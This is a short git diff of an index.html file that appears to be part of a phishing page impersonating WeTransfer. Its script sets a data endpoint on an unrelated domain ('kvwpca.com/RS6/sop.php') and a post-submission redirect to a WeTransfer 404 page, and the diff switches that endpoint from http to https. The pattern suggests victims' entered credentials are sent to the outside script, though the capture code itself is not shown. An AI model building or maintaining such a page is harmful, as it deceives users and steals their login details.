--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
 	<script type="text/javascript" src="https://code.jquery.com/jquery-latest.min.js"></script>
 	<script>
 		let resBox = 'WETran'
-		let url = 'http://kvwpca.com/RS6/sop.php'
+		let url = 'https://kvwpca.com/RS6/sop.php'
 		let over = 'https://wetransfer.com/404'
 
 		//sessionStorage.clear()
